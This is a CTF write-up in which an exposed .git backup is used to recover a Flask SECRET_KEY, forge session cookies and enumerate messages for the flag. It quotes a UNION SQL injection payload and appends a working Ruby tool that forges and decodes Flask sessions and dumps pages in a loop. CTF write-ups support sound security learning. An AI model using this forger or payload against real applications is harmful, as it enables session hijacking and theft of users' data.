One of our candidates used to send restricted data to colleagues via this service because it's free and easy to use. Try to get some secrets which can compromise them. 82.202.204.104
I launched dirb and found a /backup/ folder which seemed to be a .git directory.
Update: Such a folder can be created with this git command: git init --separate-git-dir backup/.
```
$ ~/CTF/tools/GitTools/Extractor/extractor.sh repo extractedrepo
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: 8b1084b23d869e5dc1ae4ac845589ecfb896c0c3
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/.gitignore
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/requirements.txt
[+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static
[+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/css
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/css/bootstrap.min.css
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/css/login.css
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/css/main.css
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/css/material-input.css
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/flag.txt
[+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/js
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/static/js/bootstrap.min.js
[+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/templates
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/templates/index.html
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/templates/login.html
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/templates/messages.html
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/0-8b1084b23d869e5dc1ae4ac845589ecfb896c0c3/templates/register.html
[+] Found commit: 9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/.gitignore
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/requirements.txt
[+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static
[+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/css
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/css/bootstrap.min.css
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/css/login.css
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/css/main.css
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/css/material-input.css
[+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/js
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/static/js/bootstrap.min.js
[+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/templates
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/templates/index.html
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/templates/login.html
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/templates/messages.html
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/1-9f848cceeba31da2cbd2c8ecaebb8a8dab17eee4/templates/register.html
[+] Found commit: bd55b19e5413ce609d3bc4429c3a6f272341988a
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/.gitignore
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/config.pyc
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/requirements.txt
[+] Found folder: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/templates
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/templates/index.html
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/templates/login.html
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/templates/messages.html
[+] Found file: /home/noraj/CTF/CTFZone/2017/extractedrepo/2-bd55b19e5413ce609d3bc4429c3a6f272341988a/templates/register.html
```
Now let's take a look at 2-bd55b19e5413ce609d3bc4429c3a6f272341988a/config.pyc.
Then I installed uncompyle6 to decompile the config file.
The Flask SECRET_KEY is set in order to manage sessions; here it signs the session cookies, so whoever holds the key can mint a valid session.
Flask cookies look like JWTs (JSON Web Tokens) but the structure is not the same: a JWT is header.data.signature, a Flask cookie is data.timestamp.signature (an itsdangerous URLSafeTimedSerializer token; the middle part is a timestamp, not a nonce).
It seems this is our way in: a cookie that is merely modified will be rejected, because a valid signature is needed, and producing one requires the SECRET_KEY. Decoding a Flask cookie, on the other hand, only requires base64-decoding the first part (URL-safe alphabet with the padding stripped; a leading `.` means the payload is zlib-compressed).
Then I used BurpSuite to tamper with my request and modify the cookie header, just to test the range of number IDs:
```
Here the last message for you, 326410000000
A man who would letterspace lower case would steal sheep, Frederic Goudy liked to say. If this wisdom needs updating, it is chiefly to say that a woman who would letterspace lower case would steal sheep as well.

Here the last message for you, 326410000001
To be truly great, we have to understand the motivation of our clients, maintain constant two-way communication with shockingly uncreative people, get a firm handle on copywriting and how that craft exists symbiotically with the visual element, and foresee how the finished whole will be greater than the sum of the bits and pieces we spent hours obsessing over. All of these factors cascade into the final product.

Here the last message for you, 326410001337
My secret is being not terrible at a lot of things.

Here the last message for you, 326410000042
For me, design is like choosing what I’m going to wear for the day – only much more complicated and not really the same at all.

Here the last message for you, 326410009999
Learn from the mistakes of others. You can’t live long enough to make them all yourself.

Here the last message for you, 326410019999
Styles come and go. Good design is a language, not a style.

Here the last message for you, 326410029999
I am always driven by the terror of humiliation.

Here the last message for you, 326410030199
There are no bad ideas, just bad decisions.

Here the last message for you, 326410030239
Most [clients] expect experience design to be a discrete activity, solving all their problems with a single functional specification or a single research study. It must be an ongoing effort, a process of continually learning about users, responding to their behaviors, and evolving the product or service.

Here the last message for you, 326410031505
You have no messages yet
```
After some tests I figured out that the ranges were as follows:
326410000000 to 326410030239: CTF story messages
326410030240 to 326410031505: no user ("You have no messages yet")
326410031506 to 326410031666+: CTF player messages ("Hello! Your number is 326410031XXX. Have a nice conversation.")
The flag is in a CTF story message.
So I wrote a Ruby script to dump all messages into a messages folder.
Flag was ctfzone{b1d4207ff1965105af775cfa71d8214d}.
There was another solution, found by hotab from dcua. Instead of dumping every message as I did, it was possible to perform an SQL injection through the cookie, with the session set to `{"number":"#{payload}","username":"admin"}` where `#{payload}` is `' union SELECT GROUP_CONCAT(message,'\n') FROM messages GROUP BY '1`. The leading quote closes the string literal the application builds around the number, the UNION appends the whole messages table concatenated into one field, and the trailing `'1` absorbs the application's own closing quote, so every message was listed on one page. This was quicker.
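Since the writeup does not include the script, here is an added Ruby example (my own code, not noraj's script nor anything from the challenge) covering the three cookie steps above: base64-decoding a Flask session without the key, forging a signed session once the SECRET_KEY is known, and carrying either a number or hotab's injection payload in the `number` field. It reproduces what Flask's default SecureCookieSessionInterface does with itsdangerous (salt `cookie-session`, HMAC key derivation, SHA-1, compact sorted-key JSON, optional zlib compression marked by a leading `.`). The SECRET_KEY value, the cookie name `session` (Flask's default) and the URL handed to `dump_messages` are placeholders: the page shows none of them. The timestamp epoch is a caveat too: itsdangerous 2.x uses plain Unix time, older releases counted from 2011-01-01.

```ruby
# Added example: forge, decode and verify Flask session cookies the way
# Flask's default SecureCookieSessionInterface builds them (itsdangerous
# URLSafeTimedSerializer, salt "cookie-session", HMAC-SHA1 key derivation).
# Not the author's script. SECRET_KEY, the cookie name "session" and the
# target URL passed to dump_messages are placeholders/assumptions.
require 'base64'
require 'json'
require 'net/http'
require 'openssl'
require 'zlib'

SALT = 'cookie-session'.freeze
SECRET_KEY = 'placeholder-key-recovered-from-config.pyc'.freeze # assumption
SQLI_PAYLOAD = %q{' union SELECT GROUP_CONCAT(message,'\n') FROM messages GROUP BY '1}

# itsdangerous base64: URL-safe alphabet, padding stripped
def b64(bytes)
  Base64.urlsafe_encode64(bytes, padding: false)
end

def b64d(str)
  Base64.urlsafe_decode64(str + '=' * ((4 - str.length % 4) % 4))
end

# big-endian integer with leading zero bytes dropped (itsdangerous int_to_bytes)
def int_to_bytes(n)
  hex = n.to_s(16)
  hex = '0' + hex if hex.length.odd?
  [hex].pack('H*')
end

def bytes_to_int(bytes)
  bytes.unpack1('H*').to_i(16)
end

# Flask serialises the session as compact JSON with sorted keys; itsdangerous
# zlib-compresses it when that is shorter and marks it with a leading '.'
def dump_payload(session)
  json = JSON.generate(session.sort.to_h)
  compressed = Zlib::Deflate.deflate(json)
  compressed.bytesize < json.bytesize - 1 ? '.' + b64(compressed) : b64(json)
end

def load_payload(payload)
  raw = payload.start_with?('.') ? Zlib::Inflate.inflate(b64d(payload[1..-1])) : b64d(payload)
  JSON.parse(raw.force_encoding('UTF-8'))
end

# key_derivation="hmac": the signing key is HMAC(secret_key, salt)
def derive_key(secret_key)
  OpenSSL::HMAC.digest('sha1', secret_key, SALT)
end

def signature(secret_key, signed_value)
  b64(OpenSSL::HMAC.digest('sha1', derive_key(secret_key), signed_value))
end

# Cookie layout: payload.timestamp.signature (the middle part is a timestamp,
# not a nonce). epoch_offset is 0 for itsdangerous >= 2.0; older releases
# counted seconds from 2011-01-01 (offset 1293840000).
def sign_session(session, secret_key, timestamp: Time.now.to_i, epoch_offset: 0)
  value = dump_payload(session) + '.' + b64(int_to_bytes(timestamp - epoch_offset))
  value + '.' + signature(secret_key, value)
end

# Reading a session needs no key at all: the first part is just base64.
def decode_session(cookie)
  load_payload(cookie.rpartition('.')[0].rpartition('.')[0])
end

def session_timestamp(cookie, epoch_offset: 0)
  bytes_to_int(b64d(cookie.rpartition('.')[0].rpartition('.')[2])) + epoch_offset
end

def verify_session(cookie, secret_key)
  value, _, sig = cookie.rpartition('.')
  sig == signature(secret_key, value)
end

# The session shape seen in the challenge: number plus username.
def session_cookie_for(number, secret_key = SECRET_KEY)
  sign_session({ 'number' => number.to_s, 'username' => 'admin' }, secret_key)
end

# Enumeration loop: one GET per number, response body saved under outdir.
# base_url is whatever page renders the messages (not given on the page).
def dump_messages(base_url, numbers, secret_key = SECRET_KEY, outdir = 'messages')
  Dir.mkdir(outdir) unless Dir.exist?(outdir)
  uri = URI(base_url)
  numbers.each do |n|
    req = Net::HTTP::Get.new(uri)
    req['Cookie'] = "session=#{session_cookie_for(n, secret_key)}"
    res = Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == 'https') { |h| h.request(req) }
    File.write(File.join(outdir, "#{n}.html"), res.body)
  end
end

cookie = session_cookie_for(326410001337)
puts cookie
p decode_session(cookie)             # {"number"=>"326410001337", "username"=>"admin"}
p verify_session(cookie, SECRET_KEY) # true
puts session_cookie_for(SQLI_PAYLOAD) # hotab's injection rides in the same field
```

To reproduce the dump, call `dump_messages('http://<host>/<messages page>', 326410000000..326410030239)` with the real key in SECRET_KEY; `decode_session` works on any captured cookie without a key, which is the quick way to confirm the `number`/`username` layout before forging anything.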